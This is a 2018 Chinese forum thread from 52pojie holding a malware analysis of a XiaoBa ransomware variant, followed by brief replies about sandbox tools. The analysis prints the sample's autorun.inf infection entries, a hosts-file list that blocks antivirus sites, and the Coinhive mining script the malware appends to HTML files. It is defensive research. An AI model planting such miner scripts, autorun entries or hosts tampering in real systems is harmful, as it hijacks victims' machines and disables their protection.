吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 11823|回复: 20
收起左侧

[PC样本分析] Xiaoba分析简报

  [复制链接]
JustPlay 发表于 2018-6-15 14:05
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 JustPlay 于 2018-6-15 17:58 编辑

概述
XiaoBa勒索病毒,是一种新型电脑病毒,是一款国产化水平极高的勒索病毒,主要以邮件,程序木马,网页挂马的形式进行传播。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。倒计时200秒还不缴赎金,被加密的文件就会被全部销毁。以上说明摘自百度百科,但是我分析的这个XiaoBa变种并没有以上行为特征,不过它拥有很强的隐蔽性和感染性,并且具有文件加密,文件删除和挖矿三项主要功能。
样本分析
此样本经过微步云沙箱分析(相关链接请参见《参考链接》),确认为恶意样本
tb.png
行为简图
执行简图.png
权限调整
样本运行之后,首先调整进程权限,确保自己有足够的权限进行后续的操作
adjusttoken.png
路径判断:样本会判断当前的执行路径是否在%systemroot%\360\360Safe\deepscan目录下,如果不在此目录下则拷贝自身到此目录并执行。如果在此路径下,将会首先进行一些修改系统设置相关的操作:
修改文件属性
将文件属性设置为受保护的系统文件,需要在“文件夹和搜索选项”中取消“隐藏受保护的操作系统文件(推荐)”选项才可看到
禁用UAC
uac.png
设置自启动,创建快捷方式
ziqidong.png
禁用注册表
zhucebiao.png
不显示隐藏的文
yincang.png
禁用文件夹和搜素选项
jinyong.png
创建自启动
ziidong2.png
删除SafeBoot选项
safebook.png
磁盘遍历
遍历磁盘,在磁盘根目录下创建autorun.inf文件,写入如下数据,尝试进行U盘感染,并且少不了的将此文件设置为隐藏
  [autorun]  open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe  shellexecute=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe  shell\Auto\command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe  shell\open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe  shell\open\Command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe  
创建文件夹RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588,并且将自身文件拷贝进来重写hosts文件,重定向安全厂商网址
  "127.0.0.0 360.qihoo.com"  "127.0.0.1 qihoo.com"  "127.0.0.1 www.qihoo.com"  "127.0.0.1 www.qihoo.cn"  "127.0.0.1 124.40.51.17"  "127.0.0.1 58.17.236.92"  "127.0.0.1 www.kaspersky.com"  "127.0.0.1 60.210.176.251"  "127.0.0.1 www.cnnod32.cn"  "127.0.0.1 www.lanniao.org"  "127.0.0.1 www.nod32club.com"  "127.0.0.1 www.dswlab.com"  "127.0.0.1 bbs.sucop.com"  "127.0.0.1 www.virustotal.com"  "127.0.0.1 tool.ikaka.com"  "127.0.0.1 www.jiangmin.com"  "127.0.0.1 www.duba.net"  "127.0.0.1 www.eset.com.cn"  "127.0.0.1 www.nod32.com"  "127.0.0.1 shadu.duba.net"  "127.0.0.1 union.kingsoft.com"  "127.0.0.1  www.kaspersky.com.cn"  "127.0.0.1 kaspersky.com.cn"  "127.0.0.1 virustotal.com"  "127.0.0.1 www.360.cn"  "127.0.0.1 www.360safe.cn"  "127.0.0.1 www.360safe.com"  "127.0.0.1 www.chinakv.com"  "127.0.0.1 www.rising.com.cn"  "127.0.0.1 rising.com.cn"  "127.0.0.1 dl.jiangmin.com"  "127.0.0.1 jiangmin.com",  
正题
最后创建线程,在线程函数中,XiaoBa会遍历所有文件,查找扩展名为.exe,.com,.scr,.pif,.html,.htm,.gho,.iso的文件,针对不同的扩展名执行不同的操作
.exe,.com,.scr,.pif
重写这些文件,将自身文件写入这些文件的开头,后期如果再运行这些文件的话,就会运行ZhuDongFangYu.exe.
1.png
html,.htm
在这些文件的末尾添加挖矿脚本
  "\r\n"  "<script  type=\"text/javascript\"  src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n"  "<script>\r\n"  "var miner = new  CoinHive.Anonymous('yuNWeGn9GWL72dONBX9WNEj1aVHxg49E');\r\n"  "miner.start();\r\n"  "</script>"  
.gho,.iso
对于这些文件,直接删除
2.png
一个有意思的点是这个样本的图标是360杀毒的图标,创建的文件夹名也是360,而且经过它重写的可执行程序的图标都换成了360的图标,奇虎的人怎么看。
360.png
参考链接
https://s.threatbook.cn/report/win7_sp1_enx86_office2013/11abb44de53807e32980a010a473514694f901841e63ab33f5e0ff8754009b47/?sign=history&utm_campaign=52pj&utm_medium=tz&utm_source=Adconly&gio_link_id=L9GkJ796
执行简图.png
tb.png
360.png
执行简图.png
tb.png

免费评分

参与人数 5吾爱币 +5 热心值 +5 收起 理由
huzpsb + 1 + 1 我很赞同!
LingMo + 1 + 1 我很赞同!
MaxMadcc + 1 + 1 谢谢@Thanks!
梁萧 + 1 + 1 我擦擦擦擦,微步在线这么牛逼啊!!!顶顶顶顶。
锋霜 + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Do_zh 发表于 2018-6-15 16:52
奇虎的人 坐着看。
chenjingyes 发表于 2018-6-18 00:09
JustPlay 发表于 2018-6-16 09:29
哈勃隐藏分析行为,看不到,不如微步这个好点,重要是免费啊,还能下载一些样本

腾讯哈勃可以申请高级vip免费的,就可以看行为了
yryinrui 发表于 2018-6-15 18:05
 楼主| JustPlay 发表于 2018-6-15 19:42
不知道为什么,编辑时的界面和发表后的界面不一样,正常情况是到参考链接文章就完了,大家将就一下把
FJ19950531 发表于 2018-6-15 20:07
虎的人 坐着看电脑
1810367191 发表于 2018-6-15 22:52
吾爱破解论坛因你更精彩!
chenjingyes 发表于 2018-6-16 00:46
咋不用腾讯哈勃???
zc7 发表于 2018-6-16 07:45

奇虎的人 手忙脚乱
 楼主| JustPlay 发表于 2018-6-16 09:29
chenjingyes 发表于 2018-6-16 00:46
咋不用腾讯哈勃???

哈勃隐藏分析行为,看不到,不如微步这个好点,重要是免费啊,还能下载一些样本
流风T回雪 发表于 2018-6-16 15:45
好复杂,回头再看看
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 12:32

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表